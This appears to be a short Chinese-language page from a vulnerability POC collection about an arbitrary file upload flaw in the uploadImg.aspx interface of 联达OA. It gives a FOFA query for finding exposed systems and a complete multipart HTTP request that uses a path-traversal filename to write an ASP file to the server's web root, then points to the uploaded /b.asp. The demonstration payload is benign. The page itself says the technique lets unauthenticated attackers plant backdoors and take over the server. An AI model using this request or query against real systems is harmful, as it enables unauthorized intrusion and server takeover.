Skip to content

Latest commit

 

History

History
39 lines (28 loc) · 1.16 KB

联达OA接口uploadImg.aspx任意文件上传漏洞.md

File metadata and controls

39 lines (28 loc) · 1.16 KB

联达OA接口uploadImg.aspx任意文件上传漏洞

联达OA uploadImg.aspx 接口处存在任意文件上传漏洞,未经身份攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。

Fofa

app="联达OA"

poc

POST /Dept_Portal/uploadImg.aspx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
Content-Type: multipart/form-data; boundary=boundary=00content0boundary00
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close
 
--00content0boundary00
Content-Disposition: form-data; name="DesignId"
 
1
--00content0boundary00
Content-Disposition: form-data; name="Filedata"; filename="../../../../b.asp"
Content-Type: image/png
 
<% Response.Write("Hello, World") %>
--00content0boundary00--

image-20241021210452916

/b.asp

image-20241021210504062